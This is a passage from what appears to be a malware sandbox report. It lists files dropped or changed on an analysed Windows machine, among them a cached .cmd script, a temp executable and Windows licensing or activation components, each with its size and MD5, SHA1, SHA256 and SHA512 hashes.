2edb1b32e20958701eb219573a14bed8dccd34df

SHA256
04282bb1d5ed71bdb03a05d3aa333e11da8b97a057487289bd3adff2f2721180

SHA512
f35923f7ca3aead3b0008ba5d766569fbd1ed0d34acda79040dae3a6458a4c28941f3b1f9c0a7427b11f3e7c5cccc2c45250841594210a515b4179faeb90656e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
96f084bda5c24d24160c3e3c6c3cb87a

SHA1
5b9faceb17896cb06786181eee8baa24f6473a14

SHA256
e9e14f6c0d61b9814018821d5b49eb03b868f61853855a4f904b72316814b3fb

SHA512
3e1dc3c30ce57ad8ca652a9d8da96d4b95b9bf9902e75ac24c98ca06b8c4840cdbd3ab54ad868430c92dde18c55d901d87070e1042f282fd77e6b73a054a8bf1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
7KB

MD5
542768d951aeee16f68a1feec7920215

SHA1
04e402d1409c2e524971a9ef84511a5278ad2219

SHA256
a5717d6fbb0f0489e5f20b75e4dae906ec72b2aa2883cba9a0be234d88814287

SHA512
42efc62838901e2fd384baab57d5cd3fb6e76147aef2dce6ebf65acbd33c8535231f4415f7fbdfb7f69603b7eb3f93b88223b1881880eda1400c4f59ed097b66

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
17e043d067f42a5c7ab30905e54ed7ab

SHA1
e944825e0227fa3af7d427aa3579f8ea74030a94

SHA256
af6b0f6f9b53e1faa28320ebd7a63d5db57735ca962eb518f4244e4bc8547f3f

SHA512
2df78a91e45e3221a79a1c99203b5b165d5e442cd3654fb7e245c6c46cd70e978ca91920f6ed59cc7b09bd090bfe9ce3e76526fc0f03a78633aae131287f1e26

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
7KB

MD5
c7f368c043ae933a910019f93ead71d2

SHA1
0b303a7bb92b85527c9b14230717caff5598f1cb

SHA256
daefb72059726cb75b51703577889fadee5408db8f7505e51d3153de7cbd68bc

SHA512
208da84252de7cfee48d3d51bd575e96b0aa87fe0692eaafeb00467cb6a039053ac1f2da1d81f7de4dd1a961e5aedcd719842621322b52b54441457864adbf46

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
1KB

MD5
610595655c619dab9b832b5bb8dc5f39

SHA1
db254f1882192a3f555b206fd11d34214ea681f2

SHA256
35f5e1b3a97035d6808f929689e4627a0c8dba6a6b8bccd5a7dcbe62ac1016b7

SHA512
7f77c9ed4e11f8d439814fa51484f624c3fba26f083b8803d3f92a9bc10f21a13669a6a87489977bb0a7f14ebce1a4b35113573f66f28db0f2103a1d9e0e1691

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe59df4a.TMP
Filesize
1KB

MD5
e4edbaf958f08cee79495d47f03a7722

SHA1
cf4c607197a3699e2465c37d8bd9d5b7c99819a9

SHA256
0d1573f8db7bc0d7898138b41f089ac8df5b582c6754cfaf56c6a4ca52b4530a

SHA512
47991282c05d0538eda610c22ff0e3de27a947f3c3bbf17c21bcbb7afa836ac560daaf118e37ff3ad18790e55b34a56269eed77c1d923da3d0407e573b098a13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
9080ee6cf6a98f3b3804eda823cf5370

SHA1
e178a092d7b6711a074d7b19d25c44e65d9e4297

SHA256
6df1de4abbd4b1e034f991bea50121f045eed2b67643c6d8b2b3af5fc336eee7

SHA512
b8c1149ca957e26570418cd065cc2a37b334997050b5925b6055976bd52f0b8909db1113e845befea6fa7e4c1c9950dff11205c6a01321447ae50b7b765a0f0f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
ce7af170c2b780f0d6aaaa8a853fcfa1

SHA1
f75dccb71b7bd3046fe58d8aed26ef193f28cf81

SHA256
8ed249b6ece6eacaf64337f9899ac1bcc7688aa699663c20b47f9fedbf639727

SHA512
eec830e4c2cc8c97924ca218d06e2b3d9b71de21f69cabcdbe8a78c798a817d7ab315de08d813b9dcfc1415d1d305bc2b0cdb5d89ebd25bc57aa14b100a1d6c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Albany.cmd
Filesize
26KB

MD5
7290b064b7211ee58263434e7f3e5d06

SHA1
fabad9d3bcac72a0157daebc4d97441b15125a02

SHA256
4d3e9e90746157d6e091a3362f179641f73051fa4f8055c2af1e088584a508dc

SHA512
059a3f07ddd21eb50b60a83aea1eb4f446ec9b358d57a41259adb30038dfa38bbf5e5cb8d2b1baeb525f42bf9543d509d704629b924305358f6fb5b1097fb792

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\CMPDKH9Q\I3AANQIY.txt
Filesize
14B

MD5
1207bc197a1ebd72a77f1a771cad9e52

SHA1
8ed121ff66d407150d7390b9276fe690dd213b27

SHA256
260658b9cb063d6ce96f681b18704e02fae7bf8fc995fc249ab0be1400983476

SHA512
d037cfa3b6e6ced9652b2c781bb54cf48dbaa0aaff05039ae4fd0122749eda472807d4198981aa6ceffeba6d2b23d7ad08d7d96983dbd8539cf6b07e46e157f4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\GOWSKSPC\advdlc[1].htm
Filesize
1B

MD5
cfcd208495d565ef66e7dff9f98764da

SHA1
b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

SHA256
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

SHA512
31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
16KB

MD5
0c8d37e2f5ec5467a31dcd05c7b873f7

SHA1
65e38193d5be3870ca82a7215e64e78981218073

SHA256
76367933cfb3cd598b1ef51959086d10fdf06ee46bc7567ed174941b1aaec77c

SHA512
d16fcb382fce77c9c8f049e25de2ba6427e96dc0129e94de5e576d461b203eae5cee28e06ff11b060b67593467d04bfce29771b7fa9c2682f194aaaddd4ac9f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
9b80cd7a712469a4c45fec564313d9eb

SHA1
6125c01bc10d204ca36ad1110afe714678655f2d

SHA256
5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d

SHA512
ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

Download Submit
C:\Users\Admin\AppData\Local\Temp\[email protected]
Filesize
656B

MD5
184a117024f3789681894c67b36ce990

SHA1
c5b687db3b27ef04ad2b2cbc9f4e523cb7f6ba7e

SHA256
b10d5fef165fc89e61cd16e02eac1b90b8f94ef95218bdd4b678cd0d5c8a925e

SHA512
354d3bbc1329cbbe30d22f0cf95564e44acc68d6fe91e2beb4584a473d320faf4c092de9db7f1f93cf0b235703fc8de913883985c7d5db6b596244771a1edaf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.ini
Filesize
830B

MD5
e6edb41c03bce3f822020878bde4e246

SHA1
03198ad7bbfbdd50dd66ab4bed13ad230b66e4d9

SHA256
9fa80f0889358d9db3d249a2e747e27b7c01c6123b784d94d169c0e54cacf454

SHA512
2d71b7d50212f980e82562af95598c430aa0875f7a9d9cc670ba2cb1f63057fb26fd747a99cb4ca08f2355d002daa79bda2236b3ad9e37a3cfef32ae5420e2a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000047001\file300un.exe
Filesize
376KB

MD5
73247ab5fb1b51677d85e3dcbd1d23af

SHA1
8f7bf1e75b3a279ec89cd330dfc2d6a2ee93d4a5

SHA256
30ffca4d25603e479223ababa825b47e2f65b37f24778ea07ce19a9c68494e3a

SHA512
0b09baea0d07bad1db75f1247f584ca881224240905466309514b586ac6eded5c6e399b5914644e053b6caa6fc03d85b60c14c9751edd838309bba741fca48aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\1717260417_00000000_base\360base.dll
Filesize
1.0MB

MD5
b192f34d99421dc3207f2328ffe62bd0

SHA1
e4bbbba20d05515678922371ea787b39f064cd2c

SHA256
58f13d919f44d194827b609b6b267246abc47134bb202472c0dfe033b9d7ed73

SHA512
00d4c7a0a0097eb4b31a71a0eaf6ff0d44619f77a335c75688565e34e6d7f4fb6c258917457d560c6b0a5077603845ce012e01d9862e87fb5327d7f8da970f95

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\Cert2.1\ACRSYSACRPRDCT.XRM-MS
Filesize
2KB

MD5
d2a59a8f4c2280d45165363e377ced91

SHA1
6cf0a51fc0403d4dc02e3bb4f605d5da69bd94f6

SHA256
7a9a5a6dc2f4944b534a3f67dabbf036fd44be79ab34c7e84f0a01bf3b0a779b

SHA512
71bb0db1ca839b4ef893654927934eecbb6e6001829e1dcf7825fa047b5e28b3dc6daf7247ec7990075f0669174e6087e328e2ab35b2b146ab0f87c458a25cc6

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\Forever\R\x64\SysWOW64\slmgr.vbs
Filesize
110KB

MD5
38482a5013d8ab40df0fb15eae022c57

SHA1
5a4a7f261307721656c11b5cc097cde1cf791073

SHA256
ac5c46b97345465a96e9ae1edaff44b191a39bf3d03dc1128090b8ffa92a16f8

SHA512
29c1348014ac448fb9c1a72bfd0ab16cdd62b628dc64827b02965b96ba851e9265c4426007181d2aa08f8fb7853142cc01fc6e4d89bec8fc25f3d340d3857331

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\Forever\R\x64\SysWOW64\systemcpl.dll
Filesize
401KB

MD5
e777bd47354f76cacf62fa193e510812

SHA1
08a9249d5cfb2c1f4273ab998c4c34d210620418

SHA256
b2912d080d2d4d4213846e48c902ceba6dd0b9a585fcbb05624e09bcd6633c02

SHA512
abd1a962f5962a908776e81c467bd8acb7dc694b494387fdb19d24a4a599ce5098f9b4df21e05c3df6ba071943b445019db04f8242045279d47c96c5cfd4a2a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\SLIC2.1\bootrest.exe
Filesize
100KB

MD5
ec61a27f790c3a2fa535f5c9a212f2cb

SHA1
a53853bea7cc7600cf8e8bdbafc014b4eb98bb65

SHA256
a5145be242db0a2dc76878b2e86a3e9ea2b4dc1cfbdafa59cfcf922c27a659ca

SHA512
5cb54a4919788682d16a6c4820d1f4d456a0bc698769411980439802df416ba17c1e173c0cc92f2c784a698fb77c7624c17fd9fdf7cc01c9638e8e82e9045067

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\Shortcut\R\x64\SysWOW64\ko-KR\Display.dll.mui
Filesize
10KB

MD5
548cbb6849115185bd8275f0e65203e6

SHA1
b5bf033959fe690e10839112049cd8527624ca30

SHA256
6ead232a0dd098caefbbbde6d517fe4b5c81e0b442338ae4ce80eda3d22d5acb

SHA512
2557f7a841df8ffd678d7d6a567509aec88e114e3f3144956f5bdb6bd04aa391f6470dce9ea5edef8b9f789d6b676e7fa33837029fefd68dd7ca7f564fd71241

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\Shortcut\R\x64\SysWOW64\ko-KR\shell32.dll.mui
Filesize
288KB

MD5
58d29c85bb142be898ae37506bfbd314

SHA1
2f1db8f3b29825b8e06a0ac8dd09ffd8b42c16b5

SHA256
9f8a10bbe8d42b9ccd94a910cae46f75cd52a9718a339e20d54ca3989c949ff7

SHA512
cd9e4a4f6e0ced6627c2d43ad7c563eb07ced9b5ec2d12511a7e1e4919ed54b028f439e5e230f060bacb94d0254675ee65fbbf06fe968672c63c16c135cbc782

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\Shortcut\R\x64\SysWOW64\ko-KR\themecpl.dll.mui
Filesize
9KB

MD5
3724cf41d5e93e4e688bfe0bd811314e

SHA1
17abcbfe43da30ab54dcbd0b25c42cd22531793f

SHA256
8d313b9fd972ca9eb7c340ea746217edb303a6d43917a5b42d278689cb0671ea

SHA512
2baf7b9c96f243a75c6375f4e21b28671d1057e10981907a26ed35bec955d739c8b52c98859c51b6a442af227252b3e9d4518115fcbae4176876f427f311b219

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\Shortcut\R\x64\System32\ko-KR\shell32.dll.mui
Filesize
288KB

MD5
28d04a18e93f1187e9735de3f403e420

SHA1
3e5c132c3fa95aebed080ee91ddbef4c1d062605

SHA256
92b80fd49f2443518fa61cf4ab2067414c64098f17f78423b54b781a89eaacd9

SHA512
38d4dd0b7bb0c83d6841d73d6c00b67633f53b08022913de78ce6636ad4d14cc9cf4e3c249e3002283298c2fa7fdc1d4c346d7be85bcb6f81f2c0226c8d60b42

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\Shortcut\x64\SysWOW64\ko-KR\Display.dll.mui
Filesize
10KB

MD5
7e74f142b1aaca35c3c6cf28b6a40b86

SHA1
5fb838b42fd9268f95769a301ea214519f144768

SHA256
3bb9a3802f2a5aae367d46d39d478f0cd15fd7b1208acbbb7fca5426fdc6aba8

SHA512
c5f3b19330d8f61a721fe1f94d39477a3ed45406ce9cef92dd599dd860381081ed211fd37b13457c5a8b4ca6db466f22e91a1e72a67f3444804a076a67084019

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\Shortcut\x64\winsxs\amd64_microsoft-windows-themecpl.resources_31bf3856ad364e35_6.1.7600.16385_ko-kr_bcf4e4c2171d8468\themecpl.dll.mui
Filesize
9KB

MD5
c6e7e1674fd77fe944dc40ccf5fb8ab3

SHA1
70dfa87edeb19f11a4f8c423a32749c43df580b1

SHA256
9bd7b658137b2320eb25af1fdfd3f439fb57a5893f6d8429bd785ee468e66e78

SHA512
fd2ce2b54e1fa446461eda5f1c4c93e8de0fe2ea0b76d3f29afaf1fa8d01796ac3e865b5ee526d17b31a42bcab67e5a3b7abd2a1edcaba89e05f9d6f282e7d8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\Shortcut\x64\winsxs\x86_microsoft-windows-themecpl.resources_31bf3856ad364e35_6.1.7600.16385_ko-kr_60d6493e5ec01332\themecpl.dll.mui
Filesize
9KB

MD5
f7f931c5ac61c58a794b1cc7b064e095

SHA1
84adfebd384a8c0821188d0c724469835fe7f574

SHA256
a94c0c8aeef54296a3662a744be2ab6f8c078a216c044aed047ac2555f1f71f5

SHA512
819099165a84162bc9f91d5ef9da9c029c0606d4e43e4e29068af021960eb41ff3700358fc29760333c2879cb41a6a95ccb170d6a8638c2449917eca5cba0ca3

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Business\licensing\ppdlic\Printing-Spooler-Pmc-Licensing-ppdlic.xrm-ms
Filesize
3KB

MD5
9c6de396627100ba3f4f6449101071c2

SHA1
3593b89ff1071d81b0b988733ae4a010c6a083b6

SHA256
3f3e50aaa0892342f5fb17d684a9b08c6491f4d596ba288e7b2147a3a1d8565c

SHA512
052fe7fee9aa307628507d5c130f74c95e37b8d193de9d92fa5c52e009f1d90cf75ab0af3f64ee887cfcb50beb3ec25cebb6eaf00fb07ee15d7e27ccaefdd170

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomeBasic\licensing\ppdlic\Security-Licensing-SLC-ppdlic.xrm-ms
Filesize
3KB

MD5
9e7e23572d1e530910c88ecba0b1a679

SHA1
3e141555ba74c9ee168c545384b637874f35b0df

SHA256
e3d060ea07a8d356498a9287ac89a4a17305d1243b9e10ee1f3c46e972e606fb

SHA512
0f9384b193c8b9d747bf08f45b86046fcf0a7001188b18c8b33ea99e1177fa62cb51d9d4ab607b6cf4e35d89ea3dee0eb4eff77d5a8e3809b951db3e73fa01bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomeBasic\licensing\ppdlic\Shell-InBoxGames-FreeCell-ppdlic.xrm-ms
Filesize
3KB

MD5
b7944b89503561196273c0d17502f030

SHA1
ac9940c544ea9abe85d6e9507cfe1c9f9eb27207

SHA256
291ff6ae7bc286866a51c1bf18871e0b5bb0b5fb614041315da4448073de23bb

SHA512
a9748aebc3106662a153a31e5df00ec463d034fff81398069b1051ad7450eb4d64ef0eab16e1e85c1381e16d957902e876d68d7641e04113008852b201aef6b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomeBasic\licensing\ppdlic\Shell-InBoxGames-Hearts-ppdlic.xrm-ms
Filesize
3KB

MD5
391bd2a7cc60929d685db240330cba2b

SHA1
fd802854cc759635c0d7b7caf036a57fedc7a944

SHA256
93439a9703836715414b6f8b7e763d88f07d22f9e8f3e9a158ac1d40643c5654

SHA512
0be565462458ea1559da424b14d5ca5fa3833d19fb3e116a6a330cecbf53435ee31f06f9c0684fe11f52e409fe52116688062f3796be0f6e242e89200b125e1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomeBasic\licensing\ppdlic\Shell-InBoxGames-Minesweeper-ppdlic.xrm-ms
Filesize
3KB

MD5
07a40033b73e0f53a922252f6a3efe19

SHA1
c997f7b2babcfa586e98138d3ddf4fac950869c3

SHA256
edff96a84d3f506c101d38bfdfe0eb8a85dc713a38f755161615913c2a830e5e

SHA512
c017f74b438b85b5b65c5aac990dcf9be918b9efc614d4fbdcc5ee6cbdbff02b9d99e1533b1979d761d99baaebe2dd5db599a9f3e2a8a5c21ac0cae2a575c2b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomeBasic\licensing\ppdlic\Shell-InBoxGames-PurblePlace-ppdlic.xrm-ms
Filesize
3KB

MD5
0ee363e7db60642ecc603f3b1a738a46

SHA1
adb6166efef8b6e237ea433e0c019f493793f1a3

SHA256
39a10724afa23aebe57d792ed399a9c6fa81809b7e44872bc786b68d7fd8fa4d

SHA512
18eab2c8af20e4f88e6dc438392032f2a20f0043fe82c076d6aa9092e41d8bf85c59d5cd78b4b0a1d875f35689263edae3d13a1af44c9508b49a1e27d33711e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomeBasic\licensing\ppdlic\Shell-InBoxGames-Solitaire-ppdlic.xrm-ms
Filesize
3KB

MD5
f1ad6a6e72b968e8065d19a2014f8b0c

SHA1
0f4ea08826aca82040c3d73389e5b64c7f00be37

SHA256
b0bce05b1c5f9bf085cc31ab11132239914b9c5719cbbbff0286ae39b72b5e91

SHA512
cdd012eaefefebbfd716bfb8883896cee1a3fc3b7221a33d200912c5d19e69c030f9c3c564148e785db52ff5cf04c6b8697887323e0b5d998a856dd056685ac1

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomeBasic\licensing\ppdlic\Shell-InBoxGames-SpiderSolitaire-ppdlic.xrm-ms
Filesize
3KB

MD5
21beed946490bc6c16011840bf5073a5

SHA1
e1156a0e883f7682c09f3688b9e4113726320b7b

SHA256
9f691e04bdd47408c75aa6136017a30d18021e2a3fe88bc822c1aa0e5b69097c

SHA512
b9da8a965b7a554c9594150ffec35bcea224f50af9e7942711a1e917f6b601edd6d38d7b5c547799ed9684cca62d4d6d4b60e5120e9a0b845f10946943330e40

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomeBasic\licensing\ppdlic\WindowsAnytimeUpgrade-ppdlic.xrm-ms
Filesize
3KB

MD5
740b0f346ab31e4f354a44ac49e796bb

SHA1
d44771c67e08040aef486e2804ed4728453e34b0

SHA256
ea5b539c83a95fc45951c516f81e4cb3a702acec6965652deca8b5fce83fd0e1

SHA512
940bd81773efa49da9320ff7cc9a74e25076bf5f52c22ff9c9ccd7bb0442fc4ea52bdd0be5fad7c35aec823394b41356d08f6659f36594a44222bc70eb64278d

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomeBasic\licensing\ppdlic\parentalcontrols-ppdlic.xrm-ms
Filesize
3KB

MD5
98dfc2aeca9e436e0d6c7d90b36d7050

SHA1
001723cbefeb922274e169beee7a388ad34da66d

SHA256
f8ba7bee2bd32d762aa3c0533b829a49ef449acc666634e2d8d815b7d1c973d1

SHA512
be131db0aadbab937f0ed319270dcb9421442375a2ef868f0404ec21176a96f8d4d7ba8c132dffb7f1f0ad1b2e653f3114c9ffea928401615ef78e0b5ebb563b

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\CaptureWizard-ppdlic.xrm-ms
Filesize
2KB

MD5
16c897eb67222266e7fde3e66b9f334d

SHA1
d2e7939f11c5f2cd3c3d4732538b36a4c9afe445

SHA256
cb2dbd84148e08af51b628031b1a61c1b32350ae606c86d539734b4161f83770

SHA512
c7c683246afecdf73d1020b46dcbe1841e3ff752d3e8764e75fdf178dd185ca299aa81729a8c48d61803fa93a3d0a80ca72d554166035bb3db6dd9c181cfc81d

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\DirectExperience-ppdlic.xrm-ms
Filesize
2KB

MD5
45e01af8a6dba520b69b9741eec236e1

SHA1
dd35aaa8379dde2562ea9c9a4a12edbe59c4fe53

SHA256
e3704442713955877e6bcd695e4cfd01f71d0d2276faf05c867e724c6ae7a0e0

SHA512
2b56fc0eb9fece40fc106fe9e0580f9e483639cb3178c8519fbdeb58cb6f3dca96b31f9ba5a63e0d4e7cae2cc80255739edc5fa9ce7a4da027b1900fbcabb844

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\Microsoft-Windows-AuxiliaryDisplay-ppdlic.xrm-ms
Filesize
3KB

MD5
cfc8a17c78a832b037ef88df42e74129

SHA1
74b5d2857222e83dd8f2e55068388d3553cbc0f4

SHA256
3f52bec95945c4e015520df3f7d26d67067ac7ef207038d67d4486d2ebb676c5

SHA512
34ac48bc3a34841a2054f55b226061846797f9a93ad878f7db24ba4b9f074e17fdedac4365fcee5bcc0d10d23eccac14f1c263c6778ee68e0e8664e1e8420b2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\Microsoft-Windows-DOT11PREF-ppdlic.xrm-ms
Filesize
2KB

MD5
a2ebd763803fda481ba8d78904b8e999

SHA1
d08c0e77af6bed634e3344597472015cef44a137

SHA256
26d95c2de97ebfa6b9bd62cc0dc3c7262f19cfa856d94e2d00adedf7c2d44d60

SHA512
8659ed9dbc0dc71552470d53c3bcc6487bbfa201c519cfb1f3b796d810496fb15da646ffe824e244c5ab552041513f9cc0b412e3e2989adbfc4ce759d84d5956

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\MicrosoftWindowsSafeDocsMain-ppdlic.xrm-ms
Filesize
3KB

MD5
36ad4eee439e9d02eefe0f2074f47e2c

SHA1
508622c6f2cfa6eea54e696e385b90254c725288

SHA256
3439eff764956c1af8a1778432e492eea427768bb63b0c2a7a220c232ca68a6e

SHA512
54bb1ef29abd2722c5d5e8f4d0428a480160b10f3984bb2e8f2628fbd966faad4bb75aaf282185f9113c1a7705253efce2f31b0870fae2a580a8d0ad34fa491f

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\MobilePCMobilityCenter-ppdlic.xrm-ms
Filesize
3KB

MD5
93dc4bc22bd90360e47b6bd1731f624d

SHA1
d689a4e74a45625d72888e63258e975f980df4d3

SHA256
6432d968f282257038129ce015ef8295a8e3c35a7ee41ae413ea19543e4a0da5

SHA512
f3961f5e7a4841f6bee60fac693816e006c5c609c74c7162ec5c1a3d1dd83f6e36b63db59a763a6bcc316dd0f8c886ed0fffc7b153c1712aaa4c0704f6ce3c62

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\MobilePCPresentationSettings-ppdlic.xrm-ms
Filesize
3KB

MD5
78150da47691689042f84d8ab0a8c9f0

SHA1
40a04f083a946e2805b02590833ce8d1c4d386a3

SHA256
e92b09cc9bc9eb194dc003479a90cd8cb8b48b9d04edb370428b3ae9eb99a405

SHA512
905f3cf620c1ed10f29add32871ade55970735b0b0ce63e4cbbfccc9372ba159ee83b55fa5a70cccb2a9d1598ac3f83becffc4522d98d59dbef2718c2c914841

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\MovieMaker-ppdlic.xrm-ms
Filesize
2KB

MD5
3960ef775202d376ecf06dbfeeea30a9

SHA1
51e42ad6bf4b4b2f2bb863e639cfa6d148d16c56

SHA256
417d10de53c9841c0ac9becf0c176e49530a4f1503c117c69684b3c5ff240d8d

SHA512
c37100ebd230808a8fdaab0fa529012d2064e62574aecea69be6d454db24b679d6d8fd01e55e5137b3fec0acb9dc7b562e8fdf5f0ebf003da73c9ccbc953bc1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\NetworkProjection-ppdlic.xrm-ms
Filesize
3KB

MD5
85cc4685813cf776518084f72b2a3ad0

SHA1
c87b1342cd9f180f8900d9d98c90eee1577fd55f

SHA256
cf2f6215e5dc36ed5257f32f8ed1f874a9769c1c9c3452e0cdb2e6aa3d13eb62

SHA512
93b8a2844375162dfa7c798ee2ef4ba4f424f5c67a72ff3a8d0df0956c51b28b7f020fc39831d76d97f8ea83b3f957561d81a0160b8c4ee5a4aa2a608aedbdd9

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\PeerToPeerAdhocMeetings-ppdlic.xrm-ms
Filesize
3KB

MD5
4482158fafcd71a2b32227da1cebb3b1

SHA1
80e462d2f364fff7305ffcfe66735553b584768e

SHA256
39cf9a305c346d102b0517f83453bb74f29a1405890b6050a9dac0cb62d14683

SHA512
1ce6a109f9a2ab016fc7f45abb0e006845a3d737ff515185b0d960bc9d2aef067e6632113392dd68e4cfbb1a5713c680d4a0948fa802380186d2e4924146c0ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\PeerToPeerBase-ppdlic.xrm-ms
Filesize
3KB

MD5
aae505cdd6c07d13f45f61937791ccdb

SHA1
85c3ee3fab84d3ccf7e3008399118537f5acc9c6

SHA256
148c8a73904bfb54421e4d145242c3a15ce2234de0f6d87bc417a83fad5e8e03

SHA512
4a687ca5de7eec5132daaaee4266e08af5702560f03b45ca0d0c4d1dd4f01f158d56bd7852440a0db1f7d983821ba4c5e30d72424f9bb13a40a506d4df926b39

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\SLC-Component-SKU-OCUR-ppdlic.xrm-ms
Filesize
2KB

MD5
d76bcd367483566b424f4be810a4851d

SHA1
9157f7c85434cace18cab040d7566d42bd01c2f2

SHA256
533567ffc3d0c76bc5d3aa3228a36e868337c69e09256b61ccdaaebb7c7a8073

SHA512
de9117f1b89b77856fa35876824c28dc309e93bbb7ea8eeb35591c1a43b28008d2de802ffe1c840beefa5c97e5c64de5cc7355e929d3c4af294f71bf04a2ef80

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\Security-Licensing-SLC-Component-SKU-OCUR-ppdlic.xrm-ms
Filesize
3KB

MD5
ea4c9e3d065289f99b75cca7e65ec0c5

SHA1
e377f9227b35dff577da363d102603ed6e5c445e

SHA256
f7a778f16aa72e03c588582fd6b28a0d9fb4969fce083ccf4c2d8f38dba924e1

SHA512
295525798cc5878ed348ca63694bc073f7c533905363c0ce42887e6be108e005573351532e298b219216f89e435f5123e80d7d35c700e24821c8e22a78402d5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\TabletPC-UIHub-ppdlic.xrm-ms
Filesize
3KB

MD5
4d57c5079a9fcdfddb150aefb3284851

SHA1
687d4ad9fd88c4ff66d61a455ccb6de81ef628ae

SHA256
748f8e14e24feb16bed27a345dcb1ecb2a01bc799a34124152aa7a6cc878d9cb

SHA512
